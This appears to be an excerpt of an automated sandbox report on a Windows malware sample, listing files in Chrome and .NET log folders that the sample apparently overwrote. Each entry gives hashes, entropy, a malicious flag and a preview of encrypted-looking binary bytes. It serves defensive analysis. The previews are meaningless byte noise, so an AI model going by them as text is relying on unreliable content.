                                                                                                                                                  Preview:.PNG.....[..w...Q.. .g)....%....tJ.1....3.F..PJ..\.;@.)l.2h=..v..LJ.....u.0...D..Q=.A...lJRi.a..P.....+z. =.3...Ym Kc....O.......(...Y[P.....1......._..Q..,.x)....D(#..v5='...5;.P...*Q3N.-"..h.. ...u.....{.../...N........L...M.".".\. .........Y+.v'.u.y..+.vg.,%/.wd.|).-.94|.w k...... .b..p....O..^.z.a.kzVY.g....p...t...6..U.".SKKg.8..3 jN}....;\2../L...2.>....lpS.1.'..B..l...m.'...1;..$Y.a........*.nA......v.Y.w....m..,....I.M......v.........(.....G8/.E....niF...o-Dq.`.2MG.....T..L...OK5G...5.\..D.7........n...m...g.xz/+.$d._.3n..y.P.'~r.{...7..J.W..,.)....}..[Wt..;+W.......{....)..,.k....G...:4".m.>0BR..~......E...S..i.5.[..3..h.*>..=.... i.B.wy>...I....t.(.....y9..Lc1..9..D.Gan.~.K...vB;..x.....Z.,V.ks..R...S.Y.....2.4..p..4.....i..C.S..O.J..P.`..7.o..}n...q...5..../mj..!T.@uC..Oz"..B....i................An...]. ..,....!.6.Ft.......P_...9.^.Ls.Q..}vL..4....*;.9..,...J..._....64..6b.2o...c..s[..F8"_....g.......Z..~O......(...j...

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3201
                                                                                                                                                  Entropy (8bit):7.931165710544365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:L0BylhFTqPKC83+q/drNLcSN36b/BQMRF6:Yw8PKCbqF5Lvp6DyMy
                                                                                                                                                  MD5:162F5A86080F6AA12B85F254DFCC9F65
                                                                                                                                                  SHA1:73583CBF84D578E767FC8D3473E4B4B73896678C
                                                                                                                                                  SHA-256:3C0AB6BBE2FAB93BFDCC1AF2429E43F2AFA260F0C44547C0D9A985FCB8AEC3B4
                                                                                                                                                  SHA-512:EC614ADECA81F9F15899D09D3360E646ED011FF275A61D797217747C40492771B67751AF49B512B269128B257A1BE9A1070E722385A56BD73FE2A29E7B454F72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.....'!.cg.p.q.y........X..+q.z.U.!$gdU .... <R........d....A...h.....__L..=....uv.......*.}.E.|.....D..@+.i.=.T........_,2....#.i....CR.s.D8.;.#\DA.?.H.v.-..<{.4...`.._C[.:c\r]23..]g .F.' ~.yv...O.....c..4......v.&N.\.........,.;qKr"..Z.*...Q..O..6...k.{/..f...E...y..%.#,B.E.C;....V.n...0....O.]{.f.Rh....P}..\.......DMA.b.JAT<h.i.luq....=...9ES......].............YB-...s.U.f-F..8.Z..g...H..U....0j...J.].f...$....L?d..RS.[..:.....h|^ .hS........J.o.h.#....B..J..TX...Zj.J...........;..EG>..3... ..v.r..;..Ho<8..pc.|.6f...NB.....-.%.v....O.%7L..w.......2.%. .<.h.#.,i. ..E...S.j...z..P).T.P..2..}..K....y].s..^....g..</Ura.4.`a...Q..;..(.#....u......j....x...yk...p2..8...G.@....+.M._...O.^G._.A._U..(C......77..P.......>....M..c..u.)-!M....A...j..'..}.-....D.y...@`.{..O5....i..R.5.mVI.r.....J..6......J......\.....x..,6..s...}...$H.v.. x.....y'....w....W.$Vi... ..1.....X..!...n@.$.<.,.).b.../..dm.H..u|.o....I.....cF.*w.......L=.U.........

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4170
                                                                                                                                                  Entropy (8bit):7.9484216623404205
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:5q1dT5mHF2ed2uxVHB1Y/6UGWnwihtc3b4Kpz/iDyX4C4cR1EpgJt4bHNXwdSOs1:5q89dVx0G/58jYEpgJtgWSnh587F/7g
                                                                                                                                                  MD5:4B21441EACE4C8D2D92964F5F5F16A8C
                                                                                                                                                  SHA1:4696FF2B4DBBDAD73C37D85301E398A43AB3E635
                                                                                                                                                  SHA-256:7BE3FF4A72AA817AAEFBBE5D7830A35DBD9F10EA916DE6BBD3E3D6F73B086D05
                                                                                                                                                  SHA-512:BB2B53560DE30EE8028B0BE6EF8A399F889BF6DF6986E1CEF025A3BD11506B78027F515170EED5D29CECA7DA29A08CC16B415804562C7C5393C000303A366FBD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.t.../ySF.....L.q..QQ../...T.....%.PfF.<B...#...FiP..t....O.b.B8v....(#..A.z..E.#.\...t....?....m.y$.>8.S.+"#..(.4..-..q..4.NU^.c.l.`..^{.W.fc......fr.I....U....q....).[....1..e.. ..OE.K...T).g.i.x{.>uO...z.0..........b..4....K...J..z.s..E.O....|...q.....s.z}..!....rs;..3.@A$.Mq.....lw6C].z..9...dP.4.5..-.T../..a...PL.....^LE...)bnA-".;d.P...m"...;...n...}[O.N)...M~.P%...q...{.'.......j.6....n.cfR0B....M'..pt@.{$.SS&.._Z.....jv.!. ?.t.w....2s......\d.Fb..A.2$S........x.nT|J...`9....]7...l=|06.o|.tP/......pn.3.......4..)t.1.`..).8.......H..G].#.7..,"nu.. ...a.S........_.@.@.x0k.)*5.......u....G.CD35..d..S...C.R..G...9rp.........3....z...$....N..#.q4\.(....P&].QL..^,..mW@...E..f_n..'a(..@...2.tB..}sP.X...X.%J.Pf>...n..\2..*.Y~`.KE.v./..........k..(.3WU...{.V3..MK..\i.....2.k.)Q...E.P.;cK.....*.p.).&.<)..P..^.ovcT..i..."..........^..a<.....QnMCL=..%.B.......F..Xq6....M!......b^..-.......n...2j.4a.g....|U..B.O.4.b#s7'.K[..o..k

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6103
                                                                                                                                                  Entropy (8bit):7.97224932278922
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:AT8feQFjt4+qD8NzKpV/NK1h5ZgqWUpPAww6NYhvyZi5+UAF6TjynyuCQL:Yc1Nt4+qDMyRo5ZgqT4wZYhvZAjwHGyy
                                                                                                                                                  MD5:54693094429D176547951E0C9D74BA70
                                                                                                                                                  SHA1:4D3FA1F766EB9042E8E07EDC47381FB047A40996
                                                                                                                                                  SHA-256:936B76E349E992A91CCB664B8F77678272334906844F2E3AD614D4BF12C1CDEC
                                                                                                                                                  SHA-512:6678C5A6E319343051DCDFF67AFBC34E56D0CA1E4A70D7B959FAF5A202422C3AF48AAA90EEE10569CE04CAC2DB494C7AFB37FE5FBACAEA14308A35371AABF8E7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG..G..$...>F..t.p...,0.....6.A.})......6...:c.x...hC..!...y..6...f..9....`vY.[O$..o...W..Gg..f....+.....{...oPf.......-(.l.m.:.Mo......J..,,..9.S=.....)..X...$.c...H@..:.#.W.......-.....-...)O.4H.4......*.0.4.k...S..m.....?.k.Abrj/...../d.>...kJ...S.....;..0....l...X.........-.D|s=4.....L...iauz.{,....m...._.../.Z.........K.\.9w....%W.n..3w.vO....N.....#.%2s/.Q......>y.....{.5.......B..&...j._.H%..2....."n..HS....'..J..M.RI.<S:._V^.W}.8(.....|........).'5.2........$......j.f...A..Q....K1..D..9.....k.. mNQ(e.'..F......m..u.2.j}v.r........6..R...7.%...QG......x.b...F.v..K.J..R...A<.0..6..*...$.@.\..*..+..'%].../...u....{...ReTD4.;.s.T7...q.#......-..x..H4.3..!.8..;P.=jr......n.v..y<h...J6#9.I.@FY.:.krb.A....#m.46B."RJ.7..7..ixd...!Y'..w.V.....1..t...#.-..q.9~....z>.o..?.../Z.......tZ.BE.2...#'.J./...<..e...p.\...Mfj...il.........-~.f....&.|~..-L.'p$...<.[q......Y<.|.B=...F.....*..+..dS.z0...PX.(.<C.PC..#..9.Fept ...*efG...Q........

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):10398
                                                                                                                                                  Entropy (8bit):7.9819821008931555
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:3t1tVL8T1yhwo2UXjvIxdykcfmOzXPNTWwfr1n0cyA:91tOhyhwt4wxQjHljzyA
                                                                                                                                                  MD5:83108DDAD792D4357E2AAFC94BC20DEA
                                                                                                                                                  SHA1:FC6E2E299424A228655E051985CA78C60255FFC9
                                                                                                                                                  SHA-256:9E7D80B2AC3BC589B544EAD4B550BB57BAD587D428C67AB7CC239677A5BEC29F
                                                                                                                                                  SHA-512:4BB0500F480CE531ACA2214531178218D70833037EC1334C2EF4237C2ED35A9FCF0B09CF89CC4B9C48A530345CAE8FEBA9080D331719D9E1586FA1F6D8DB7DDF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG..{8u..`.-.........fw......,0..4.....'...Y.......3K....8D.s..:.m..F.s..;.x....y:.f1..K.|.....&ALo.U.Cf#..C{.W[.......TRi..P.^v..P...eo.*Q...[k...q0.Gw...$.l;...%C..f....{..3j...e...e.E2....&.p...z1F..rD<.....c.0..W.v".v.,..)R[R.R."p.Ng......y..j..&...._2-..K,.."....>Z.%I.x..zl.u4b..Y....._..>.........f......xt........&.].(\.....m..Y..5..&..I...&1Z.....>y...80..qN.^..."0\.Z<u.....O%...v...T...e\....;@....Z.W..........:.%hn....>.;..n. ...B....J...........-<e.....l0...6....s.2G....{e....vl....N.D....6..WY."9\Z/.R..>.Lx..#..eZ.ES.g.!.........A3.u....t.+....X.3..^..L|x.....1.4;A..j..;C..,.n.)...C...=.b..............ptv>.o.M.b..G....(.5..u...b.P.'I..........CG..5..r.5-Rj....j.>.SZ....'.W..g*w...~.#ne/.[....^...:...X.....T.-......I....,H...._.Y"l.E.9.[...0@.v......{$3.9....|)......9QP+...4.Y.d.m.......C!....k.`..n....Ma...1.....p....UN....e.w.>|..!z.Se..z..i....O\...P8..U.=.nv8.....5...'..*.M.?]Ndo)5..kc.,v.U+o.mg..F~.S.h_z.p.cnp...

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):29006
                                                                                                                                                  Entropy (8bit):7.994687221803499
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:+mfcQuu9CTZiOKfklsw6sShVy5a34RjIKyOu8/4QPgryr:Xfct6mZb7H245rsAvYr4
                                                                                                                                                  MD5:4D3D5B25344D22CA1C1776B4481CE598
                                                                                                                                                  SHA1:65B9D7A30DEDC5E52DCD9A62AFA393F0EAD0F163
                                                                                                                                                  SHA-256:3A82A5AFCBCC7A3B5958FACF9F7DBFB299F060B8A6C0CF41845C230FC81C1302
                                                                                                                                                  SHA-512:2954D34A4741424411051B7738F26B7CAC554D32D94633350DE485A8C46212E2AA4B9105ADC7A9298D70A92EFC38308FA3F2F343A69CBE630F007A9E04737F7D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitu9{.+..q.+...-..d2.%Z..4..o...([...0)...Q..I?Z-`.,2.........a...2.M.K....JN$..c`...VI...KR..43.sjS..n........"....2W...I<4..nL.U.)O..jD.3....._...-.......emWC......M../..CK.X.<.I..A.ka.@...x.6.R.....n.....hz.1+.'...c$.i..,.XO.R|.2.z....]<....x.........._.X....4o.;. .fe^..#.2$.U=.?v...~`%^......t..d...........G...-...x}....B..\\Gx#...-L0.Z..:.#...O...E.C. .....}&..}K[._..aPg..]..T...D~i..=.....O.....X...,=...H......m.p...u.n..........].1....k...c.%<Zz-..,.U..g..F...vl.2.5..w..F..)>...h....qNy...4.i5L_...B....NW..).G....4HT..jCq..O..0.b.....9........b-.vH......aB.y..5......h.=qU..7<..??k..#VGiWI..?.K.'....$...>.........w.jtd.c8....Z.UA_.g..0f'7.\.|..h...'.......J.i...F..Ff..'#..2n%.@.*.....7....4f..;d.....&T:..^1.`..WM..&4 .=..Zo.1...l.U.r..[.."..[Ze....R....<..e.Il...0..M.h.]..B)...-..O..!.........G*....(."..O.2....H_.......jd\x..Q.(o.n..w.../..8..3.1_*(N.=.5NlIh...BI5.|....8.`.&....F.^$.h...li:..^.....}dF..mqEE.E.Q..?."8...Uz....

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3795
                                                                                                                                                  Entropy (8bit):7.954903149480734
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:p6mAygMWBIQ6UVOw+9/SDjiMdyenFT2UuJTOJ//nFaUK/2EjI:prC3BIHD9aDj7genhaYtK/2Z
                                                                                                                                                  MD5:F931BE6849049B59DE16112BD72512EC
                                                                                                                                                  SHA1:01891467BBB437BD860FD434DB2E028B8F4B7DC7
                                                                                                                                                  SHA-256:9DB97937A5DF8B939ECD981D9539CEAB05A91B6FE280841B9F268574640665CC
                                                                                                                                                  SHA-512:9CA7FD01F5417F7885D81A12A4FD0646E4FFF1EF3D7AB274C662376E9B77AC2A793FCF3BA112C0CAAB45A9A3189B6833C88BE091CCE734BEEC98FEC7CF9B29EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:A..r....:l..;E.HS..}.X4a.5Cv......w+.....(?...xP.=QM.Z[..F..Wj.jn..O :....K...^..G..L....X.t...p....@....a..53.....v.f.zbLG...H..\.n..6..u..D...E1....eY7....nW.s.3T4q)l.....b8..6..D..../..%.V\....Y.s._.....W.f.%...L..B...S....).....'.cn...pE.H.?..D..C.f.....`.$.;I(...C.h5Z..2.8.&...jUt....V.1........N.55.....5-.....v.$......hw4..Mi.A..6..'.T(.,K9.~.\..dD..,.f#z....m.'..$]........&r.....=.r.F..E..u............S.'.|}..AwG..@.{h..,..t..]._.5}..O...x...s.....96.4...b.?..hu.......n9..I7..-@..R~..QT.C"...A.s.q..m.PE...&.x....A!.H.....HY./..?\...\w)...@..O....V.o...s.....(...1..EMIK.r..d.1^3...b.....|.?..C.wj.^..;.j.....l)..a.......a.Z...i.(}..J.)...`c-....HF..E.D.B....g!.k.7...wy)...T7"k...=.8...wE#\.....J.5\...0y.n..h8{]."My...-.N...".V....&.Z...t.. 6.|FCUX.....D.....et...ic..A.J5C.ej.r..27.i.F..^....A.{.Z....$:..u....L....3.xh...n..qa...y#.\AR.....l...R..S...40:IAk]<..}...0...d.}.% ..7...%..z.o.uK..E.JR:..w.<.;......-{.Q.0.+P1...|..B.

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):654
                                                                                                                                                  Entropy (8bit):7.630284419967295
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kMPPPvfxkBUzs3tiIJNxo9O0ICmlrabB98nP3KYyCcC5rL3T1paCSUdNcii9a:9PJkBHgIjf0mNabb8nPKwcsL37K2bD
                                                                                                                                                  MD5:06A7AE5AEEAE150370F7FE3CF4DF6A68
                                                                                                                                                  SHA1:43B0F2C26A62C913A0D08BCED7578DAF5E4ABEDF
                                                                                                                                                  SHA-256:BEDE5715311B9B81EB54C9B227FFB573E14C0FC3DD2C0BD0D2C66CDAEC6CAB17
                                                                                                                                                  SHA-512:441AD85A4FBF2E4EF1A566BC5E34573E59EB8AE9E3E6A7A9A0E4AAAFF6F9A6F235AE8D0D2794A3FFC3CBED58F6849385B246DC04C7B34485A33CE25A7C7AD0A4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.e........1".=....x4....J......A*..m..<_......`*.R.`.S...f....Ww.0......8.>R.)......F...!.).x.x..D..%..........9....u....-$/*...i....G.][.ky...[..sj_w...W..-..rH..\..S~....;.R1'...O.H..ZE_)=j..px.-.qC.`X.r-.....RJ......V..5R...A+......zGJ..@..".....rn..F..t..4...=..O...0:E..l1....!6.;.25...&..F6/..Gi.B;.3..A;.oW.Gt.-<...D.H...\..*z...^.7....?.+td...M.C....UG+."mN4..).....w+&V..M%...Ds...t...V.jh..NR."..VM.y..Y .S...2.-f.\].g..)......lX.q.: |Stc.....e....WE.+.......N......7...c.....I+.l..C..9.8..O...r..........E....ny..(........`H-...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1247
                                                                                                                                                  Entropy (8bit):7.839754199251075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:GDWX8G4jLhg5CMKjAbA/EJq34SpkRY10pUZfRsmJsub/uh2bD:0e8G4hgVbZlgkRwZZhJsuj/D
                                                                                                                                                  MD5:5AF5935D67D6E2420DFE39212189076F
                                                                                                                                                  SHA1:E31A4A48F43948436FF193983B3B00A58FC2E1B7
                                                                                                                                                  SHA-256:25E701D9F329032A8B0548D8872C1D0F5CCB1561F3B8F60B836EBB4147D85B2B
                                                                                                                                                  SHA-512:A7BED3469CFFCF554CA48717427DC4C46F65DAC7051F7E5EA9A7BABD1520CC42CF11DBB7E3FBF57A9F5B829BEE899FD4F1E3010B7411C9E64B6184DDC4C13C72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.h.6.}}L..j...%.~e:9..A.'....X.|.Y.mw.......I.3z.P.-U}k...^.Wd..*)...w.P....hbtoAa......3;...&r..e.k..W..@...q...!.sg.5.)*.6r|w.`.7m7.5.;.....P.......QG.y.Fx..s....%.N.h.;."!..F~-K_)....Q..7..W@}8...&.g.p....*....[.[..N1...mX>/..n..Y?. ...?.-#..=.dzk.G..e..0.. ...4.5.Sa!..J..W+..d..'...5.oC...... o../.......Wk..Sg%oC,.yO.9.O..b.H...xJ.2t..u.../.....|?L.-.eIbZj.......'1.}C..y...&..r......!..)...j...<...UvT...0.z... g....R.....vO..'....%.Qe....y0K......!...(....@).W..R.!...)Y...Z..m.y4......w.FQo.".`...R.._...J.0.....|?I.t%9y...^.....r.k...m......}..l.. ..G......-v..hQ.....5U..RJ.....i...'q.?S..ky.=rB....5..........2...a(J>.........e(.v^.N9&...c.Yf..J..E...k.f{.8.Vj....h.3.J8p..@[..a$V.........c...P....(.r.p...NOr..."7..g]k.d...v..*..:.X]q.y......-.....{..V...Pw.....{._J@...lK..\-x..'.(f...A2.o.t7....?..5%..<0.`\7c..8...O.*...*QJ.o...h..$...l..'9.d@Y........u...vR}j..)..........+...?.L)Qo.b.....I.M.h...SW{..9l_;..F\.;4.D)...a..:.]+..[...I

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):672
                                                                                                                                                  Entropy (8bit):7.645589155205809
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kUCpYS0+VB3GLLCynfEsH1mwJzcqkwB13LOCPoxy36awCGGz8oVfiWSUdNcii9a:bHSzICynbvcqd1qCAwxwCGGvlA2bD
                                                                                                                                                  MD5:6ADFB55BB65780F7778EFFAE72D1902C
                                                                                                                                                  SHA1:1D652B05FCC22FD6DB496983904DFAE9D4029CAD
                                                                                                                                                  SHA-256:35E2491EB7C73DC9E8B1AED37ACBDFECD6FCB5D762D8885A02882869AFC72BAB
                                                                                                                                                  SHA-512:1C7CC5BB16DB515405C6C0903E8BF0C3212A2C8D752110A6F596082D6DB204FF26B7F4298435B9AE87CB233E9AE8A346C0CB4259E658D2A225325436D64F83F4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.NA.a..*...I..r`{.S9..o...........\P..<N..!^.^...3.....v..............8.h...|.\h.+).1...^.u.>..[..$...G...3M.`....x.5.H..4a.4.a=k.5...)...K.....s.!G.....F.[&.....G/#.o......[!..L..E.<..........s..b`...0..f../5.Ac.4.13.b.f2.....[.'$#.W.7.6...G.."1A.#.s...."'5..e..C..j^F^....N...1+.&.<:....Y..R....T.W.X.s..F;.g.c.3....j..8(.}v30.-E%..7z.vE.s:.B.3..h.....6.L.8.A$.=.@.<.....@.j(.D.....y...>l..Vm..E.y.P.bv^33z.m.......`.X..J...pv..&......K......,.h...2.k..3M..._......|x...h.-..S..]..^..]......T.o..k+ip.1}.~.k..Y.|.2U....F..F'.....g6.o.Gu. S.HJ./..'.qt..4O?...@mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49486
                                                                                                                                                  Entropy (8bit):7.996574219633321
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:5R/gwP5d6KnutszLXyjXaBgY0mA9oMNG1smCwqZqbcgJH0ujtdC96Fbaii:wwBdbysz+mpA9t4sFwqZicgH0Gtdbsii
                                                                                                                                                  MD5:2E64F508533B1C818B02B67A924A3DEF
                                                                                                                                                  SHA1:05E3E829980802A3AF01079377800325F2889EBB
                                                                                                                                                  SHA-256:0CE0EC369DECA989CE715148263D2C97839C38EC898B8AC0E0AF8F3BF63B446D
                                                                                                                                                  SHA-512:B06FFC9235CBB61DB694556C1CCE6B24953D47D5C13B53B31EC8CFCC9400AE47C798728BFFB6F568463B8CB001748E7857EA07F570B91D400614E8A8CE3E7891
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLitN......U.......TM.......C9E.71....n...'....;-..e...Y0.]...F8..".km......~.].*......}!. .p!...Sg..5!..*`...L.V..>.R..5i..y42....c.W+..E..#..pQ.......y\.. .e.>..W.M..Z..v.p1O......+.~.w.6...\....$.......a.yF.7..".u.L.Y.R.[).e....5J.O..K...Yy.:.b.EzO..%.grL..W..q6...[.?;D....,4!.)r4....j......:...0..!kh...W...JB.Q(T.w.U.e..../%.Ud.6.cp.!-H>.(z.W.v-'.2.u.M......~..+...+V.l...h....."....{..0.\<........#*d..\0t...6v5..$..Aq...../.dg7..*7.9)....`.,(A7..x.......%..s....u......M%=d....".^@.&....04....9H..1...?.B]...._$....... ...7...Xa...F.n.......c.Mi.D...Q..../)c....,....8...@.R..'..;.-...Y....$.>....}_`\.\..d....rT..]......]N..lN....S.6na..b0}..........#.0q.4.v...[Z.. ,.DT...;y.-.N...V......|D/....e.T.x..t......u..._..n&.F.PJ..<.p.u....\...."....{.F.,N.i.`...c.....D......H?u.....$...%...\.J.h...;.gz{.!.6aZ.....N.....gj.*E.a.....7*..v..]j..?...x.k...C.h....k........<~.....sN\.Jm.v.E..I.2.>......%+7..#..............H.rI....2..Q... ...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):354
                                                                                                                                                  Entropy (8bit):7.245585883509604
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:QpVj5P6HVIGI9y2rmIKo4ftAcWGolZjz9xzQXSf6okXIJJbAGYqMQPqinIS1WdNX:QpnyHVIh86mIz4fxolPPj+UqzSUdNciD
                                                                                                                                                  MD5:7273949855BE3F64DB8E4801A45CF7A0
                                                                                                                                                  SHA1:0FF1D9B79FB5FFB264D00249E4CC571032772715
                                                                                                                                                  SHA-256:C77F4500225AA1982B00CA7AC3600FB94B582D03A12DCE0C7EA81C42575E9C62
                                                                                                                                                  SHA-512:6C618B9F47DEA38C982E0C09994C1016F3FF7633569F274E7F9FC12844E4E719AA13271657FD50979AB97D0BD0F20D7FA05D274453203E612D25F1D593A97AF1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fuV/5..Y"PT....o.^..I...7.......$v..b......K...%.._..........f7.h.&>V~I.T....7.r.ub..A..7P:..M...JC.7V3:...g..D.eK....d....M/.....-.f.J....i{....[...y?..[........'.{......iz........9..1..g.}8$.......vP_..4.,..Y.B.$>AH..]3n[.f....n..,.~+..\(..)n{..l......".vfmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1554
                                                                                                                                                  Entropy (8bit):7.859940349708868
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8W+ONX29mo08ZgcUwNtgMZfZgG8QLKGl8/06OSInZky8Yd/P9AtYvSayNf/mUjGw:C+2708Z9LgCRgDcZlw68tYRy9FhD
                                                                                                                                                  MD5:DACC39E83CF448A8B5FD27EE84AEBF72
                                                                                                                                                  SHA1:1ADB819F3A4303970AE198334695DD568F550D11
                                                                                                                                                  SHA-256:807E9CE51555A964D916340B34A3319DAB7D262233D6BE440036C5D434A04B69
                                                                                                                                                  SHA-512:999E02C82087142EF85EEFE8EA5207736EA97538FE782526C27244D2B50176E3D704CD74C43E03C5D179B45E3A565D42AEC3EA8A7491117D33BEDEE0C5C0EFEC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fu....+e.}(!H.^;.W.J..N.7.>..p.\.....^d.Wc.7...O..}w..b.....gI..^.A...c.......*..k.W\x...i...w..Y.1T.J...D.......o.R..}R.......Mj...........^..*.Zd.E.&.Y.zm.%.|.o.x....}x.p.#...5.........|,.p.g..>S.5En...xl'.2..j....E..9...\N.._..\.Y...G.0L.zF.o.....*S.....51...\..Di.M4.w../}$..2.Y.a.!aMe.].l.......w...j.....Q...n....+........5W..1.6..:....J...|+.....$........k,x"...wE..y2q5..R\`..8.Fi......p.....p.....As..u0Q.'.P...e....NO]O....}I...6##I........D...c..1....X....$.\...[8.c..2...X.M...s,.JWR]7.3.6....u..o..>....&......c.FS...-.4X.Q...E..D..\.u..$..L.....:j..d.K.7..r..k..O.wH...f<....R......pE.D.S.>T3..bX./.....q.W.O.i!.q..)..)....)\....Z. ...c1kJ......%}.........wwXMm]4.mB.D...M.B._..5HS].....d....^.^.u...R\...O.R.B@].{...\}"k.......-pf..k..O..Es2....f..n.6.].0.;..x..0?.z..a..k....=...2..Z.S..v...AA#..;....X):...I.h..@;.......U...u.7bNO.T......?.y......TQ]....1;...F.cjS<U-./6.....i.K...9...w.G_..T. "^...........J......-..K.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LocalBridge.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1952
                                                                                                                                                  Entropy (8bit):7.901607376039365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:5J6h10cgWl7naJkkCwCWjWVORyqU6X7VzS4bD:5J6b22naXeWjWoyG7tS+
                                                                                                                                                  MD5:A297DBC9B435A1527BC68505F52871EB
                                                                                                                                                  SHA1:FD742E8A03015B37D5EF3640B04BB53E3BCBB213
                                                                                                                                                  SHA-256:739448D8F87FC39478D29C4FB43656B2EAEE2CFA52FF123BE3C053A17992A7A8
                                                                                                                                                  SHA-512:D2A5A95C274F1DD19ACEC9B5C023F2FC679155ABA2360449E533F75B647D51892CB2CA7A68CAC214EF0D23026505B67DD2716467F046141F4511402B42D848D2
                                                                                                                                                  Malicious:false
